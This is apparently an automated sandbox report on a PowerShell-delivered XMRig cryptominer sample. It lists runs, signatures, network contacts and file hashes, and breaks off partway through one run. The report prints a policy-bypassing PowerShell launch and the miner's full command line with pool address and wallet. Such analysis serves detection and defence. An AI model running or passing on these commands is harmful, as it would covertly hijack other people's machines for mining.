Malware Analysis Report

2025-01-06 15:41

Sample ID 240525-s5989shd4y
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags
xmrig execution miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-25 15:43

Signatures

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:18

Platform

win11-20240419-en

Max time kernel

1799s

Max time network

1757s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3108-0-0x00007FF830B93000-0x00007FF830B95000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a3jp1zla.xhr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3108-9-0x000002069EA90000-0x000002069EAB2000-memory.dmp

memory/3108-10-0x00007FF830B90000-0x00007FF831652000-memory.dmp

memory/3108-11-0x00007FF830B90000-0x00007FF831652000-memory.dmp

memory/3108-12-0x00007FF830B90000-0x00007FF831652000-memory.dmp

memory/3108-14-0x000002069EF70000-0x000002069EF82000-memory.dmp

memory/3108-15-0x000002069EA70000-0x000002069EA7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2220-46-0x000001E421E60000-0x000001E421E80000-memory.dmp

memory/2220-47-0x000001E423660000-0x000001E423680000-memory.dmp

memory/2220-48-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/3108-49-0x00007FF830B90000-0x00007FF831652000-memory.dmp

memory/3108-50-0x00007FF830B93000-0x00007FF830B95000-memory.dmp

memory/2220-52-0x000001E4236A0000-0x000001E4236C0000-memory.dmp

memory/2220-51-0x000001E423680000-0x000001E4236A0000-memory.dmp

memory/2220-53-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-54-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-56-0x000001E423680000-0x000001E4236A0000-memory.dmp

memory/2220-55-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-57-0x000001E4236A0000-0x000001E4236C0000-memory.dmp

memory/2220-58-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-59-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-60-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-61-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-62-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-63-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-64-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-65-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-66-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-67-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-68-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-69-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-70-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-71-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-72-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-73-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-74-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-75-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-76-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-77-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-78-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-79-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-80-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-81-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-82-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-83-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-84-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-85-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-86-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-87-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-88-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-89-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-90-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-91-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-92-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-93-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-94-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-95-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-96-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-97-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-98-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-99-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-100-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-101-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-102-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-103-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-104-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-105-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-106-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-107-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-108-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-109-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-110-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-111-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-112-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-113-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-114-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-115-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

memory/2220-116-0x00007FF640E50000-0x00007FF641A83000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:22

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1789s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 138.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 72.239.69.13.in-addr.arpa udp

Files

memory/1500-0-0x00007FFC5F793000-0x00007FFC5F795000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mcbs0ztt.g22.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1500-10-0x000001CFF18E0000-0x000001CFF1902000-memory.dmp

memory/1500-11-0x00007FFC5F790000-0x00007FFC60251000-memory.dmp

memory/1500-12-0x00007FFC5F790000-0x00007FFC60251000-memory.dmp

memory/1500-14-0x00007FFC5F790000-0x00007FFC60251000-memory.dmp

memory/1500-15-0x000001CFF1CF0000-0x000001CFF1D02000-memory.dmp

memory/1500-16-0x000001CFF1B70000-0x000001CFF1B7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3160-47-0x00000164A28A0000-0x00000164A28C0000-memory.dmp

memory/3160-48-0x00000164A2A30000-0x00000164A2A50000-memory.dmp

memory/3160-49-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-50-0x00000164A2A50000-0x00000164A2A70000-memory.dmp

memory/3160-51-0x00000164A2A70000-0x00000164A2A90000-memory.dmp

memory/3160-52-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/1500-53-0x00007FFC5F793000-0x00007FFC5F795000-memory.dmp

memory/1500-54-0x00007FFC5F790000-0x00007FFC60251000-memory.dmp

memory/3160-55-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/1500-56-0x00007FFC5F790000-0x00007FFC60251000-memory.dmp

memory/3160-57-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-58-0x00000164A2A50000-0x00000164A2A70000-memory.dmp

memory/3160-59-0x00000164A2A70000-0x00000164A2A90000-memory.dmp

memory/3160-60-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-61-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-62-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-63-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-64-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-65-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-66-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-67-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-68-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-69-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-70-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-71-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-72-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-73-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-74-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-75-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-76-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-77-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-78-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-79-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-80-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-81-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-82-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-83-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-84-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-85-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-86-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-87-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-88-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-89-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-90-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-91-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-92-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-93-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-94-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-95-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-96-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-97-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-98-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-99-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-100-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-101-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-102-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-103-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-104-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-105-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-106-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-107-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-108-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-109-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-110-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-111-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-112-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-113-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-114-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-115-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-116-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-117-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

memory/3160-118-0x00007FF6E5F60000-0x00007FF6E6B93000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:23

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1773s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

